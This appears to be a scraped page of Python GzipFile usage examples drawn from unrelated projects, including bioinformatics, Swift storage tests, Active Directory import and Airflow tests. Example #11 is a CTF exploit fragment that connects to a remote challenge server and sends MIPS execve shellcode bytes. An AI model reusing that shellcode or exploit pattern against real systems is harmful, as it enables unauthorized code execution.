def __enter__(self):
     self._buffer = StringIO()
     self._writer = GzipFile(mode="wb", fileobj=self._buffer)
     return self._writer
示例#2
0
def process_dmd_files_impl(dmd_files, args):
    out_dir = os.path.dirname(dmd_files[0])

    procrank = open(os.path.join(out_dir, 'b2g-procrank'), 'r').read().split('\n')
    proc_names = {}
    for line in procrank:
        # App names may contain spaces and special characters (e.g.
        # '(Preallocated app)').  But for our purposes here, it's easier to
        # look at only the first word, and to strip off any special characters.
        #
        # We also assume that if an app name contains numbers, it contains them
        # only in the first word.
        match = re.match(r'^(\S+)\s+\D*(\d+)', line)
        if not match:
            continue
        proc_names[int(match.group(2))] = re.sub('\W', '', match.group(1)).lower()

    for f in dmd_files:
        # Extract the PID (e.g. 111) and UNIX time (e.g. 9999999) from the name
        # of the dmd file (e.g. dmd-9999999-111.txt.gz).
        basename = os.path.basename(f)
        dmd_filename_match = re.match(r'^dmd-(\d+)-(\d+).', basename)
        if dmd_filename_match:
            creation_time = datetime.fromtimestamp(int(dmd_filename_match.group(1)))
            pid = int(dmd_filename_match.group(2))
            if pid in proc_names:
                proc_name = proc_names[pid]
                outfile_name = 'dmd-%s-%d.txt.gz' % (proc_name, pid)
            else:
                proc_name = None
                outfile_name = 'dmd-%d.txt.gz' % pid
        else:
            pid = None
            creation_time = None
            outfile_name = 'processed-' + basename

        outfile = GzipFile(os.path.join(out_dir, outfile_name), 'w')
        def write(str):
            print(str, file=outfile)

        write('# Processed DMD output')
        if creation_time:
            write('# Created on %s, device time (may be unreliable).' %
                  creation_time.strftime('%c'))
        write('# Processed on %s, host machine time.' %
              datetime.now().strftime('%c'))
        if proc_name:
            write('# Corresponds to "%s" app, pid %d' % (proc_name, pid))
        elif pid:
            write('# Corresponds to unknown app, pid %d' % pid)
        else:
            write('# Corresponds to unknown app, unknown pid.')

        write('#\n# Contents of b2g-procrank:\n#')
        for line in procrank:
            write('#    ' + line.strip())
        write('\n')

        fix_b2g_stack.fix_b2g_stacks_in_file(GzipFile(f, 'r'), outfile, args)
        if not args.keep_individual_reports:
            os.remove(f)
示例#3
0
文件: asset.py 项目: luhn/rocketsled
 def encode(self):
     encoded = super(CompressedAsset, self).encode()
     io = BytesIO()
     with GzipFile(fileobj=io, mode='wb') as gz:
         gz.write(encoded)
     return io.getvalue()
示例#4
0
def is_fastq(fastq_file, verbose):
    n_lines_head = 10000

    if not os.path.isfile(fastq_file):
        sys.stderr.write("[E::main] Error: " + fastq_file +
                         ': No such file.\n')
        sys.exit(1)

    try:
        zippedInput = False
        if (fastq_file.endswith(".gz")):
            zippedInput = True
            with GzipFile(fastq_file) as filef:
                head = list(islice(filef, n_lines_head))
        elif (fastq_file.endswith(".bz2")):
            zippedInput = True
            with BZ2File(fastq_file) as filef:
                head = list(islice(filef, n_lines_head))
        else:
            try:
                with open(fastq_file) as filef:
                    head = list(islice(filef, n_lines_head))
            except:
                sys.stderr.write("[E::main] Error loading file: " +
                                 fastq_file + "\n")
                sys.exit(1)
    except:
        sys.stderr.write("[E::main] Error. Cannot load the file " +
                         fastq_file + "\n")
        sys.stderr.write(
            "[E::main] Supported file are zipped .gz or .bz2, or plain text\n")
        sys.exit(1)

    # check min length of fastq file:
    if len(head) < 4:
        sys.stderr.write("[E::main] Error: file " + fastq_file +
                         " is not a fastq file\n")
        sys.exit(1)

    # go through the lines in head
    all_lengths = list()
    cont_line = 1
    cont = 0
    for line in head:
        cont = cont + 1
        if zippedInput:
            line = line.decode('ascii')

        if cont_line == 1:
            if line[0] != "@":
                print_error_fasta("Line does not start with @", cont,
                                  fastq_file)

        if cont_line == 2:
            l1 = len(line)

        if cont_line == 3:
            if line[0] != "+":
                print_error_fasta("Line does not start with +", cont,
                                  fastq_file)

        if cont_line == 4:
            l2 = len(line)
            if (l1 != l2):
                print_error_fasta(
                    "Length of quality line is different from length of the read",
                    cont, fastq_file)
            else:
                all_lengths.append(l1)

        if cont_line != 4:
            cont_line = cont_line + 1
        else:
            cont_line = 1

    if len(all_lengths) < 1:
        sys.stderr.write("[E::main] Error: file " + fastq_file +
                         " is not a fastq file\n")
        sys.exit(1)

    if (all(x == all_lengths[0]
            for x in all_lengths)) and len(all_lengths) > 1:
        if verbose >= 2:
            sys.stderr.write(
                "[W::main] Warning: file " + fastq_file +
                ". The length of the first " + str(len(all_lengths)) +
                " reads is " + str(all_lengths[0]) +
                ". It is suggested to quality control the reads before profiling\n"
            )

    avg_length = sum(all_lengths) / float(len(all_lengths))
    return int(avg_length)
示例#5
0
def in_process_setup(the_object_server=object_server):
    _info('IN-PROCESS SERVERS IN USE FOR FUNCTIONAL TESTS')
    _info('Using object_server class: %s' % the_object_server.__name__)
    conf_src_dir = os.environ.get('SWIFT_TEST_IN_PROCESS_CONF_DIR')
    show_debug_logs = os.environ.get('SWIFT_TEST_DEBUG_LOGS')

    if conf_src_dir is not None:
        if not os.path.isdir(conf_src_dir):
            msg = 'Config source %s is not a dir' % conf_src_dir
            raise InProcessException(msg)
        _info('Using config source dir: %s' % conf_src_dir)

    # If SWIFT_TEST_IN_PROCESS_CONF specifies a config source dir then
    # prefer config files from there, otherwise read config from source tree
    # sample files. A mixture of files from the two sources is allowed.
    proxy_conf = _in_process_find_conf_file(conf_src_dir, 'proxy-server.conf')
    _info('Using proxy config from %s' % proxy_conf)
    swift_conf_src = _in_process_find_conf_file(conf_src_dir, 'swift.conf')
    _info('Using swift config from %s' % swift_conf_src)

    monkey_patch_mimetools()

    global _testdir
    _testdir = os.path.join(mkdtemp(), 'tmp_functional')
    utils.mkdirs(_testdir)
    rmtree(_testdir)
    utils.mkdirs(os.path.join(_testdir, 'sda1'))
    utils.mkdirs(os.path.join(_testdir, 'sda1', 'tmp'))
    utils.mkdirs(os.path.join(_testdir, 'sdb1'))
    utils.mkdirs(os.path.join(_testdir, 'sdb1', 'tmp'))
    utils.mkdirs(os.path.join(_testdir, 'sdc1'))
    utils.mkdirs(os.path.join(_testdir, 'sdc1', 'tmp'))

    swift_conf = _in_process_setup_swift_conf(swift_conf_src, _testdir)
    _info('prepared swift.conf: %s' % swift_conf)

    # Call the associated method for the value of
    # 'SWIFT_TEST_IN_PROCESS_CONF_LOADER', if one exists
    conf_loader_label = os.environ.get('SWIFT_TEST_IN_PROCESS_CONF_LOADER')
    if conf_loader_label is not None:
        try:
            conf_loader = conf_loaders[conf_loader_label]
            _debug('Calling method %s mapped to conf loader %s' %
                   (conf_loader.__name__, conf_loader_label))
        except KeyError as missing_key:
            raise InProcessException('No function mapped for conf loader %s' %
                                     missing_key)

        try:
            # Pass-in proxy_conf, swift_conf files
            proxy_conf, swift_conf = conf_loader(proxy_conf, swift_conf)
            _debug('Now using proxy conf %s' % proxy_conf)
            _debug('Now using swift conf %s' % swift_conf)
        except Exception as err:  # noqa
            raise InProcessException(err)

    obj_sockets = _in_process_setup_ring(swift_conf, conf_src_dir, _testdir)

    # load new swift.conf file
    if set_swift_dir(os.path.dirname(swift_conf)):
        constraints.reload_constraints()
        storage_policy.reload_storage_policies()

    global config
    config['__file__'] = 'in_process_setup()'
    if constraints.SWIFT_CONSTRAINTS_LOADED:
        # Use the swift constraints that are loaded for the test framework
        # configuration
        _c = dict(
            (k, str(v)) for k, v in constraints.EFFECTIVE_CONSTRAINTS.items())
        config.update(_c)
    else:
        # In-process swift constraints were not loaded, somethings wrong
        raise SkipTest

    global _test_socks
    _test_socks = []
    # We create the proxy server listening socket to get its port number so
    # that we can add it as the "auth_port" value for the functional test
    # clients.
    prolis = listen_zero()
    _test_socks.append(prolis)

    # The following set of configuration values is used both for the
    # functional test frame work and for the various proxy, account, container
    # and object servers.
    config.update({
        # Values needed by the various in-process swift servers
        'devices':
        _testdir,
        'swift_dir':
        _testdir,
        'mount_check':
        'false',
        'client_timeout':
        '4',
        'allow_account_management':
        'true',
        'account_autocreate':
        'true',
        'allow_versions':
        'True',
        'allow_versioned_writes':
        'True',
        # TODO: move this into s3api config loader because they are
        #       required by only s3api
        'allowed_headers':
        "Content-Disposition, Content-Encoding, X-Delete-At, "
        "X-Object-Manifest, X-Static-Large-Object, Cache-Control, "
        "Content-Language, Expires, X-Robots-Tag",
        # Below are values used by the functional test framework, as well as
        # by the various in-process swift servers
        'auth_host':
        '127.0.0.1',
        'auth_port':
        str(prolis.getsockname()[1]),
        'auth_ssl':
        'no',
        'auth_prefix':
        '/auth/',
        # Primary functional test account (needs admin access to the
        # account)
        'account':
        'test',
        'username':
        '******',
        'password':
        '******',
        's3_access_key':
        'test:tester',
        's3_secret_key':
        'testing',
        # Secondary user of the primary test account (needs admin access
        # to the account) for s3api
        's3_access_key2':
        'test:tester2',
        's3_secret_key2':
        'testing2',
        # User on a second account (needs admin access to the account)
        'account2':
        'test2',
        'username2':
        'tester2',
        'password2':
        'testing2',
        # User on same account as first, but without admin access
        'username3':
        'tester3',
        'password3':
        'testing3',
        's3_access_key3':
        'test:tester3',
        's3_secret_key3':
        'testing3',
        # Service user and prefix (emulates glance, cinder, etc. user)
        'account5':
        'test5',
        'username5':
        'tester5',
        'password5':
        'testing5',
        'service_prefix':
        'SERVICE',
        # For tempauth middleware. Update reseller_prefix
        'reseller_prefix':
        'AUTH, SERVICE',
        'SERVICE_require_group':
        'service',
        # Reseller admin user (needs reseller_admin_role)
        'account6':
        'test6',
        'username6':
        'tester6',
        'password6':
        'testing6'
    })

    acc1lis = listen_zero()
    acc2lis = listen_zero()
    con1lis = listen_zero()
    con2lis = listen_zero()
    _test_socks += [acc1lis, acc2lis, con1lis, con2lis] + obj_sockets

    account_ring_path = os.path.join(_testdir, 'account.ring.gz')
    with closing(GzipFile(account_ring_path, 'wb')) as f:
        pickle.dump(
            ring.RingData([[0, 1, 0, 1], [1, 0, 1, 0]],
                          [{
                              'id': 0,
                              'zone': 0,
                              'device': 'sda1',
                              'ip': '127.0.0.1',
                              'port': acc1lis.getsockname()[1]
                          }, {
                              'id': 1,
                              'zone': 1,
                              'device': 'sdb1',
                              'ip': '127.0.0.1',
                              'port': acc2lis.getsockname()[1]
                          }], 30), f)
    container_ring_path = os.path.join(_testdir, 'container.ring.gz')
    with closing(GzipFile(container_ring_path, 'wb')) as f:
        pickle.dump(
            ring.RingData([[0, 1, 0, 1], [1, 0, 1, 0]],
                          [{
                              'id': 0,
                              'zone': 0,
                              'device': 'sda1',
                              'ip': '127.0.0.1',
                              'port': con1lis.getsockname()[1]
                          }, {
                              'id': 1,
                              'zone': 1,
                              'device': 'sdb1',
                              'ip': '127.0.0.1',
                              'port': con2lis.getsockname()[1]
                          }], 30), f)

    # Default to only 4 seconds for in-process functional test runs
    eventlet.wsgi.WRITE_TIMEOUT = 4

    def get_logger_name(name):
        if show_debug_logs:
            return debug_logger(name)
        else:
            return None

    acc1srv = account_server.AccountController(config,
                                               logger=get_logger_name('acct1'))
    acc2srv = account_server.AccountController(config,
                                               logger=get_logger_name('acct2'))
    con1srv = container_server.ContainerController(
        config, logger=get_logger_name('cont1'))
    con2srv = container_server.ContainerController(
        config, logger=get_logger_name('cont2'))

    objsrvs = [(obj_sockets[index],
                the_object_server.ObjectController(config,
                                                   logger=get_logger_name(
                                                       'obj%d' % (index + 1))))
               for index in range(len(obj_sockets))]

    if show_debug_logs:
        logger = get_logger_name('proxy')
    else:
        logger = utils.get_logger(config, 'wsgi-server', log_route='wsgi')

    def get_logger(name, *args, **kwargs):
        return logger

    with mock.patch('swift.common.utils.get_logger', get_logger):
        with mock.patch('swift.common.middleware.memcache.MemcacheMiddleware',
                        FakeMemcacheMiddleware):
            try:
                app = loadapp(proxy_conf, global_conf=config)
            except Exception as e:
                raise InProcessException(e)

    nl = utils.NullLogger()
    global proxy_srv
    proxy_srv = prolis
    prospa = eventlet.spawn(eventlet.wsgi.server,
                            prolis,
                            app,
                            nl,
                            protocol=SwiftHttpProtocol)
    acc1spa = eventlet.spawn(eventlet.wsgi.server,
                             acc1lis,
                             acc1srv,
                             nl,
                             protocol=SwiftHttpProtocol)
    acc2spa = eventlet.spawn(eventlet.wsgi.server,
                             acc2lis,
                             acc2srv,
                             nl,
                             protocol=SwiftHttpProtocol)
    con1spa = eventlet.spawn(eventlet.wsgi.server,
                             con1lis,
                             con1srv,
                             nl,
                             protocol=SwiftHttpProtocol)
    con2spa = eventlet.spawn(eventlet.wsgi.server,
                             con2lis,
                             con2srv,
                             nl,
                             protocol=SwiftHttpProtocol)

    objspa = [
        eventlet.spawn(eventlet.wsgi.server,
                       objsrv[0],
                       objsrv[1],
                       nl,
                       protocol=SwiftHttpProtocol) for objsrv in objsrvs
    ]

    global _test_coros
    _test_coros = \
        (prospa, acc1spa, acc2spa, con1spa, con2spa) + tuple(objspa)

    # Create accounts "test" and "test2"
    def create_account(act):
        ts = utils.normalize_timestamp(time())
        account_ring = Ring(_testdir, ring_name='account')
        partition, nodes = account_ring.get_nodes(act)
        for node in nodes:
            # Note: we are just using the http_connect method in the object
            # controller here to talk to the account server nodes.
            conn = swift.proxy.controllers.obj.http_connect(
                node['ip'], node['port'], node['device'], partition, 'PUT',
                '/' + act, {
                    'X-Timestamp': ts,
                    'x-trans-id': act
                })
            resp = conn.getresponse()
            assert resp.status == 201, 'Unable to create account: %s\n%s' % (
                resp.status, resp.body)

    create_account('AUTH_test')
    create_account('AUTH_test2')
示例#6
0
# gzipout.py
from gzip import GzipFile
from StringIO import StringIO

sio = StringIO()
gzf = GzipFile(fileobj=sio, mode='wb')
gzf.write(sys.stdin.read())
gzf.close()

# Output gzipped stream.
sys.stdout.write(sio.getvalue())

# It is performed as follows for trying operation on shell.
# $ cat textfile | python gzipout.py | zcat

# Moreover, since socket object used for network programming
# cannot do seek(), it is once copied to StringIO.

# gzipin.py
from gzip import GzipFile
from StringIO import StringIO

gzstream = open('gzipped.gz', 'rb')
sio = StringIO(gzstream)
gz = GzipFile(fileobj=sio, mode='rb')
print gz.read()
示例#7
0
def unzip(infile, mode="rb", filename=None, **kwargs):
    if "r" not in mode:
        filename = filename or "file"
        z = ZipFile(infile, mode="w", **kwargs)
        fo = z.open(filename, mode="w")
        fo.close = lambda closer=fo.close: closer() or z.close()
        return fo
    z = ZipFile(infile)
    if filename is None:
        filename = z.namelist()[0]
    return z.open(filename, mode="r", **kwargs)


register_compression("zip", unzip, "zip")
register_compression("bz2", BZ2File, "bz2")
register_compression("gzip", lambda f, **kwargs: GzipFile(fileobj=f, **kwargs),
                     "gz")

try:
    import lzma

    register_compression("lzma", lzma.LZMAFile, "xz")
    register_compression("xz", lzma.LZMAFile, "xz", force=True)
except ImportError:
    pass

try:
    import lzmaffi

    register_compression("lzma", lzmaffi.LZMAFile, "xz", force=True)
    register_compression("xz", lzmaffi.LZMAFile, "xz", force=True)
示例#8
0
def load_gaf_entries(local=True):
    with open_gaf(local=local) as zf:
        with GzipFile(fileobj=zf) as f:
            f_without_comments = (line.decode('utf-8') for line in f
                                  if not line.startswith(b'!'))
            yield from csv.reader(f_without_comments, delimiter='\t')
def getDecompressedBase64Lic(lic):
    return GzipFile(fileobj=cStringIO.StringIO(b64decode(lic))).read()
示例#10
0
    def post(self):
        try:
            # Initialize report
            report = {'inserted': 0, 'updated': 0, 'total': 0, 'warnings': {}}

            objects_apply_policy = {'computer': [], 'user': []}

            db = self.request.db
            # Read GZIP data
            postedfile = self.request.POST['media'].file
            xmldata = GzipFile('', 'r', 9, StringIO(postedfile.read())).read()

            # Read XML data
            xmldoc = minidom.parseString(xmldata)

            # Get the root domain
            xmlDomain = xmldoc.getElementsByTagName('Domain')[0]
            is_ad_master = self.request.POST['master'] == 'True'
            domain = self._get_domain(self.importSchema[0], xmlDomain,
                                      is_ad_master, report)

            # Convert from AD objects to MongoDB objects
            mongoObjects = {}
            mongoObjectsPath = {}
            for objSchema in self.importSchema:
                objs = xmldoc.getElementsByTagName(objSchema['adName'])
                for adObj in objs:
                    if not adObj.hasAttribute('ObjectGUID'):
                        raise Exception(
                            'An Active Directory object must has "ObjectGUID" attrib.'
                        )
                    mongoObject, is_saving = self._convertADObjectToMongoObject(
                        domain, mongoObjects, objSchema, adObj, is_ad_master,
                        report, objects_apply_policy)
                    report['total'] += 1
                    if is_saving:
                        mongoObjects[
                            mongoObject['adDistinguishedName']] = mongoObject
                    mongoObjectsPath[
                        mongoObject['adDistinguishedName']] = mongoObject
            # Order mongoObjects by dependences
            if mongoObjects:
                mongoObjects[domain['adDistinguishedName']] = domain
                mongoObjectsPath[domain['adDistinguishedName']] = domain
                mongoObjects = self._orderByDependencesMongoObjects(
                    mongoObjects, domain)

            # Save each MongoDB objects
            properRootDomainADDN = domain['adDistinguishedName']
            for index, mongoObject in mongoObjects.items():
                if index == properRootDomainADDN:
                    continue
                # Get the proper path ("root,{0}._id,{1}._id,{2}._id...")
                listPath = re.findall(ur'([^, ]+=(?:(?:\\,)|[^,])+)', index)
                nodePath = ','.join(listPath[1:])

                # Find parent
                mongoObjectParent = mongoObjectsPath[nodePath]
                mongoObjectParent = self.collection.find_one(
                    {'_id': mongoObjectParent['_id']})
                path = '{0},{1}'.format(mongoObjectParent['path'],
                                        str(mongoObjectParent['_id']))
                mongoObject['path'] = path
                # Save mongoObject
                self._saveMongoObject(mongoObject)

            # AD Fixes
            admin_user = self.request.user
            chef_server_api = get_chef_api(get_current_registry().settings,
                                           admin_user)
            if is_ad_master:
                for index, mongoObject in mongoObjects.items():
                    if mongoObject['type'] == 'group':
                        if mongoObject['members'] != []:
                            mongoObject['members'] = []
                            self._saveMongoObject(mongoObject)

            for index, mongoObject in mongoObjects.items():
                updateMongoObject = False
                # MemberOf
                if mongoObject['type'] in ('user', 'computer'):
                    if 'memberof' not in mongoObject or is_ad_master:
                        mongoObject['memberof'] = []

                    if 'adPrimaryGroup' in mongoObject and mongoObject[
                            'adPrimaryGroup']:
                        group = mongoObjects[mongoObject['adPrimaryGroup']]
                        if is_visible_group(db, group['_id'], mongoObject):
                            if not mongoObject['_id'] in group['members']:
                                group['members'].append(mongoObject['_id'])
                                self._saveMongoObject(group)

                            if mongoObjects[mongoObject['adPrimaryGroup']][
                                    '_id'] not in mongoObject['memberof']:
                                mongoObject['memberof'].append(mongoObjects[
                                    mongoObject['adPrimaryGroup']]['_id'])
                        else:
                            self._warningGroup(group, mongoObject, report)
                        updateMongoObject = True
                        del mongoObject['adPrimaryGroup']

                    if 'adMemberOf' in mongoObject and mongoObject[
                            'adMemberOf']:
                        for group_id in mongoObject['adMemberOf']:
                            group = mongoObjects[group_id]
                            if is_visible_group(db, group['_id'], mongoObject):
                                if not mongoObject['_id'] in group['members']:
                                    group['members'].append(mongoObject['_id'])
                                    self._saveMongoObject(group)

                                if mongoObjects[group_id][
                                        '_id'] not in mongoObject['memberof']:
                                    mongoObject['memberof'].append(
                                        mongoObjects[group_id]['_id'])
                            else:
                                self._warningGroup(group, mongoObject, report)
                        updateMongoObject = True
                        del mongoObject['adMemberOf']

                # Create Chef-Server Nodes
                if mongoObject['type'] == 'computer':
                    chef_server_node = reserve_node_or_raise(
                        mongoObject['name'],
                        chef_server_api,
                        'gcc-ad-import-%s' % random.random(),
                        attempts=3)
                    ohai_gecos_in_runlist = self.RECIPE_NAME_OHAI_GECOS in chef_server_node.run_list
                    gecos_ws_mgmt_in_runlist = self.RECIPE_NAME_GECOS_WS_MGMT in chef_server_node.run_list
                    if not ohai_gecos_in_runlist and not gecos_ws_mgmt_in_runlist:
                        chef_server_node.run_list.append(
                            self.RECIPE_NAME_OHAI_GECOS)
                        chef_server_node.run_list.append(
                            self.RECIPE_NAME_GECOS_WS_MGMT)
                    elif not ohai_gecos_in_runlist and gecos_ws_mgmt_in_runlist:
                        chef_server_node.run_list.insert(
                            chef_server_node.run_list.index(
                                self.RECIPE_NAME_GECOS_WS_MGMT),
                            self.RECIPE_NAME_OHAI_GECOS)
                    elif ohai_gecos_in_runlist and not gecos_ws_mgmt_in_runlist:
                        chef_server_node.run_list.insert(
                            chef_server_node.run_list.index(
                                self.RECIPE_NAME_OHAI_GECOS) + 1,
                            self.RECIPE_NAME_GECOS_WS_MGMT)
                    save_node_and_free(chef_server_node)
                    chef_server_client = Client(mongoObject['name'],
                                                api=chef_server_api)
                    if not chef_server_client.exists:
                        chef_server_client.save()
                    mongoObject['node_chef_id'] = mongoObject['name']
                    updateMongoObject = True

                # Save changes
                if updateMongoObject:
                    self._saveMongoObject(mongoObject)

            # apply policies to new objects
            for node_type, node_names in objects_apply_policy.items():
                nodes = self.collection.find({
                    'name': {
                        '$in': node_names
                    },
                    'path':
                    get_filter_this_domain(domain),
                    'type':
                    node_type
                })
                for node in nodes:
                    apply_policies_function = globals()['apply_policies_to_%s'
                                                        % node['type']]
                    apply_policies_function(self.collection,
                                            node,
                                            admin_user,
                                            api=chef_server_api)

            # Return result
            status = '{0} inserted, {1} updated of {2} objects imported successfully.'.format(
                report['inserted'], report['updated'], report['total'])
            response = {'status': status, 'ok': True}
        except Exception as e:
            logger.exception(e)
            response = {'status': u'{0}'.format(e), 'ok': False}
        warnings = report.get('warnings', [])
        if warnings:
            response['warnings'] = warnings
        return response
示例#11
0
b *0x400d40
b *0x400c8c
b *0x400b5c
b *0x400b30
c
''')
    else:
        io = process(['./samples/0'])
else:
    io = remote('106.53.114.216', 9999)
    assert solve_pow(io)
    assert io.recvline() == b'Binary Dump:\n'
    assert io.recvline() == b'===============\n'
    binary_dump_gz_b64 = io.recvline().decode()
    binary_dump_gz = base64.b64decode(binary_dump_gz_b64)
    binary_dump = GzipFile(fileobj=BytesIO(binary_dump_gz)).read()
if args.LOCAL:
    solution = bytes.fromhex(
        'da1ada1abb3dbb3d7def24b6f6fbb7b64b5d1669edf7edf787295cf25999ad717fe4e6c4bbf817b0c01f90c18ffd780a46480093c134fe043f7f3f7f87f361ad'
    )
else:
    solution = emu.solve(binary_dump, 'ctf')
io.send(solution)
io.recvuntil(b'Name\n')
io.send(b'mslc')
io.recvuntil(b'Your time comes.\n> ')
# https://packetstormsecurity.com/files/105611/MIPS-execve-Shellcode.html
io.send(b"\xff\xff\x06\x28"
        b"\xff\xff\xd0\x04"
        b"\xff\xff\x05\x28"
        b"\x01\x10\xe4\x27"
 def setUp(self):
     self.file_names = {}
     self.task_id = 'S3ToHiveTransferTest'
     self.s3_key = 'S32hive_test_file'
     self.field_dict = OrderedDict([('Sno', 'BIGINT'),
                                    ('Some,Text', 'STRING')])
     self.hive_table = 'S32hive_test_table'
     self.delimiter = '\t'
     self.create = True
     self.recreate = True
     self.partition = {'ds': 'STRING'}
     self.headers = True
     self.check_headers = True
     self.wildcard_match = False
     self.input_compressed = False
     self.kwargs = {
         'task_id': self.task_id,
         's3_key': self.s3_key,
         'field_dict': self.field_dict,
         'hive_table': self.hive_table,
         'delimiter': self.delimiter,
         'create': self.create,
         'recreate': self.recreate,
         'partition': self.partition,
         'headers': self.headers,
         'check_headers': self.check_headers,
         'wildcard_match': self.wildcard_match,
         'input_compressed': self.input_compressed
     }
     try:
         header = b"Sno\tSome,Text \n"
         line1 = b"1\tAirflow Test\n"
         line2 = b"2\tS32HiveTransfer\n"
         self.tmp_dir = mkdtemp(prefix='test_tmps32hive_')
         # create sample txt, gz and bz2 with and without headers
         with NamedTemporaryFile(mode='wb+', dir=self.tmp_dir,
                                 delete=False) as f_txt_h:
             self._set_fn(f_txt_h.name, '.txt', True)
             f_txt_h.writelines([header, line1, line2])
         fn_gz = self._get_fn('.txt', True) + ".gz"
         with GzipFile(filename=fn_gz, mode="wb") as f_gz_h:
             self._set_fn(fn_gz, '.gz', True)
             f_gz_h.writelines([header, line1, line2])
         fn_gz_upper = self._get_fn('.txt', True) + ".GZ"
         with GzipFile(filename=fn_gz_upper, mode="wb") as f_gz_upper_h:
             self._set_fn(fn_gz_upper, '.GZ', True)
             f_gz_upper_h.writelines([header, line1, line2])
         fn_bz2 = self._get_fn('.txt', True) + '.bz2'
         with bz2.BZ2File(filename=fn_bz2, mode="wb") as f_bz2_h:
             self._set_fn(fn_bz2, '.bz2', True)
             f_bz2_h.writelines([header, line1, line2])
         # create sample txt, bz and bz2 without header
         with NamedTemporaryFile(mode='wb+', dir=self.tmp_dir,
                                 delete=False) as f_txt_nh:
             self._set_fn(f_txt_nh.name, '.txt', False)
             f_txt_nh.writelines([line1, line2])
         fn_gz = self._get_fn('.txt', False) + ".gz"
         with GzipFile(filename=fn_gz, mode="wb") as f_gz_nh:
             self._set_fn(fn_gz, '.gz', False)
             f_gz_nh.writelines([line1, line2])
         fn_gz_upper = self._get_fn('.txt', False) + ".GZ"
         with GzipFile(filename=fn_gz_upper, mode="wb") as f_gz_upper_nh:
             self._set_fn(fn_gz_upper, '.GZ', False)
             f_gz_upper_nh.writelines([line1, line2])
         fn_bz2 = self._get_fn('.txt', False) + '.bz2'
         with bz2.BZ2File(filename=fn_bz2, mode="wb") as f_bz2_nh:
             self._set_fn(fn_bz2, '.bz2', False)
             f_bz2_nh.writelines([line1, line2])
     # Base Exception so it catches Keyboard Interrupt
     except BaseException as e:
         logging.error(e)
         self.tearDown()
示例#13
0
def _zip_file(file_path):
    gz_file_path = file_path + '.gz'
    with open(file_path, 'rb') as f_in:
        with GzipFile(gz_file_path, 'wb') as f_out:
            shutil.copyfileobj(f_in, f_out)
    return gz_file_path
def S3CompressedReader(bucket, path):
    s3 = boto3.resource('s3')
    r = s3.Object(bucket, path).get()
    body = StringIO(r['Body'].read())
    return GzipFile(mode="rb", fileobj=body)
示例#15
0
文件: psur.py 项目: shenpingle/tray
def downallfiles3(id, psurobjid, filename, reportid):
    #
    url = "http://www.adrs.org.cn/ADR/cdrAttachment/attachmentDiskManager/"
    #id = "109913972074597010463482100000"
    #psurobjid = "243013972078880790070655100000"
    import random
    some = random.randrange(1000000000000000, 9999999999999999)
    boundary = '-----------------------------' + str(some)
    parts = []

    parts.append('--' + boundary)
    parts.append('Content-Disposition: form-data; name="action"')
    parts.append('')
    parts.append(str("download"))

    parts.append('--' + boundary)
    parts.append('Content-Disposition: form-data; name="id"')
    parts.append('')
    parts.append(id)

    parts.append('--' + boundary + '--')
    parts.append('')

    body = '\r\n'.join(parts)

    header = {
        'Accept':
        'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        'Accept-Encoding': 'gzip, deflate',
        'Host': 'Host: www.adrs.org.cn',
        'Accept-Language': 'en-US,en;q=0.5',
        'Connection': 'keep-alive',
        'User-Agent':
        'Mozilla/5.0 (Windows NT 5.1; rv:30.0) Gecko/20100101 Firefox/30.0',
        'Content-Type': 'multipart/form-data; boundary=%(boundary)s' % {
            "boundary": boundary
        },
        'Referer':
        'http://www.adrs.org.cn/ADR/page/adrpage/psur/viewPsurReport.jsp?fdObjectId=%(objid)s&type=2'
        % {
            "objid": psurobjid
        }
    }

    try:
        common_url = urllib2.Request(url, headers=header)
        response = urllib2.urlopen(common_url, data=body, timeout=120)
        #print "response.info():",response.info()
        from cStringIO import StringIO
        from gzip import GzipFile
        data2 = GzipFile('', 'r', 0, StringIO(response.read())).read()
        response_data = data2
        # 定义要创建的目录
        import pathDlg
        mkpath = "c:\\mykill\\web\\"
        #mkpath = pathDlg.readini_path()
        path = mkdir(mkpath, psurobjid)
        name = path + "\\" + filename

        print name

        local_file = open(name, "wb")
        local_file.write(response_data)
        local_file.close()
    except (urllib2.HTTPError, urllib2.URLError, socket.error), exception:
        print u"下载出现错误,打印文件信息:", id, psurobjid, filename, reportid
        tempdata = (reportid, psurobjid, filename, id)
        insert_sql = (
            "insert into pusr_dwfinfo_down_error(ReportID, FileID,ShowFileName BackUp1) "
            "value(%s,%s,%s,%s,%s)")
        mdrsql.mdr_insert_alone(insert_sql, tempdata)
        pass
示例#16
0
def in_process_setup(the_object_server=object_server):
    _info('IN-PROCESS SERVERS IN USE FOR FUNCTIONAL TESTS')
    _info('Using object_server class: %s' % the_object_server.__name__)
    conf_src_dir = os.environ.get('SWIFT_TEST_IN_PROCESS_CONF_DIR')

    if conf_src_dir is not None:
        if not os.path.isdir(conf_src_dir):
            msg = 'Config source %s is not a dir' % conf_src_dir
            raise InProcessException(msg)
        _info('Using config source dir: %s' % conf_src_dir)

    # If SWIFT_TEST_IN_PROCESS_CONF specifies a config source dir then
    # prefer config files from there, otherwise read config from source tree
    # sample files. A mixture of files from the two sources is allowed.
    proxy_conf = _in_process_find_conf_file(conf_src_dir, 'proxy-server.conf')
    _info('Using proxy config from %s' % proxy_conf)
    swift_conf_src = _in_process_find_conf_file(conf_src_dir, 'swift.conf')
    _info('Using swift config from %s' % swift_conf_src)

    monkey_patch_mimetools()

    global _testdir
    _testdir = os.path.join(mkdtemp(), 'tmp_functional')
    utils.mkdirs(_testdir)
    rmtree(_testdir)
    utils.mkdirs(os.path.join(_testdir, 'sda1'))
    utils.mkdirs(os.path.join(_testdir, 'sda1', 'tmp'))
    utils.mkdirs(os.path.join(_testdir, 'sdb1'))
    utils.mkdirs(os.path.join(_testdir, 'sdb1', 'tmp'))

    swift_conf = _in_process_setup_swift_conf(swift_conf_src, _testdir)
    obj_sockets = _in_process_setup_ring(swift_conf, conf_src_dir, _testdir)

    global orig_swift_conf_name
    orig_swift_conf_name = utils.SWIFT_CONF_FILE
    utils.SWIFT_CONF_FILE = swift_conf
    constraints.reload_constraints()
    storage_policy.SWIFT_CONF_FILE = swift_conf
    storage_policy.reload_storage_policies()
    global config
    if constraints.SWIFT_CONSTRAINTS_LOADED:
        # Use the swift constraints that are loaded for the test framework
        # configuration
        _c = dict(
            (k, str(v)) for k, v in constraints.EFFECTIVE_CONSTRAINTS.items())
        config.update(_c)
    else:
        # In-process swift constraints were not loaded, somethings wrong
        raise SkipTest
    global orig_hash_path_suff_pref
    orig_hash_path_suff_pref = utils.HASH_PATH_PREFIX, utils.HASH_PATH_SUFFIX
    utils.validate_hash_conf()

